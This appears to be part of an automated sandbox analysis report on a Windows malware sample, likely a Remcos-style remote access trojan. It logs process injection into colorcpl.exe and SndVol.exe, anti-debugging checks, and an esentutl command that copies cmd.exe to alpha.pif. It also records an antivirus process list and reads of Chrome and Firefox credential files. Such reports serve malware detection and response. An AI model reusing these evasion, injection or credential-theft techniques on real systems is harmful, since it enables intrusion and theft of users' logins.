Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW, 11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0280E8F9 FindFirstFileExA, 11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW, 13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0284E8F9 FindFirstFileExA, 13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02807877 FindFirstFileW,FindNextFileW, 13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 13_2_0280BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_027C7CD2
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, Vjrsafyh.PIF, 0000000A.00000002.2240432486.00000000005FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Vjrsafyh.PIF, 0000000C.00000002.2323126754.00000000005B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_029DF744
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_027F4A8A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_029D894C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A8A8E5 mov eax, dword ptr fs:[00000030h] 0_2_02A8A8E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02803355 mov eax, dword ptr fs:[00000030h] 8_2_02803355
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_02803355 mov eax, dword ptr fs:[00000030h] 11_2_02803355
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02843355 mov eax, dword ptr fs:[00000030h] 13_2_02843355
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D20B2 GetProcessHeap,HeapFree, 8_2_027D20B2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027F4BD8 SetUnhandledExceptionFilter, 8_2_027F4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_027F4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027F4BD8 SetUnhandledExceptionFilter, 11_2_027F4BD8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0283503C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02834A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_02834A8A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_02834BD8 SetUnhandledExceptionFilter, 13_2_02834BD8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0283BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_0283BB71

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2800000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_027D2132
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_027D2132
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 13_2_02812132
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D9662 mouse_event, 8_2_027D9662
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager+
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A7C246 cpuid 0_2_02A7C246
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_029C5ACC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: GetLocaleInfoA, 0_2_029CA7C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: GetLocaleInfoA, 0_2_029CA810
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_029C5BD8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 8_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 8_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 8_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 8_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 8_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 8_2_028125C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 8_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 8_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 8_2_02811D58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_028125C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 11_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_0280896D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_02811FD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_02811D58
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 12_2_029A5ACC
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 12_2_029A5BD7
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: GetLocaleInfoA, 12_2_029AA810
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 13_2_02852393
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 13_2_028520B6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 13_2_0285201B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_02852143
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_02852690
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 13_2_02848484
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_028524BC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 13_2_028525C3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 13_2_0280F90C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 13_2_0284896D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 13_2_02851FD0
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 13_2_02851D58
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C920C GetLocalTime, 0_2_029C920C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DB69E GetComputerNameExW,GetUserNameW, 8_2_027DB69E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02809210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_02809210
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CB78C GetVersionExA, 0_2_029CB78C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_027CBA4D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_027CBA4D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 13_2_0280BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 11_2_027CBB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 13_2_0280BB6B

Remote Access Functionality

Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: C:\Windows\SysWOW64\SndVol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 8_2_027C569A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 11_2_027C569A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 13_2_0280569A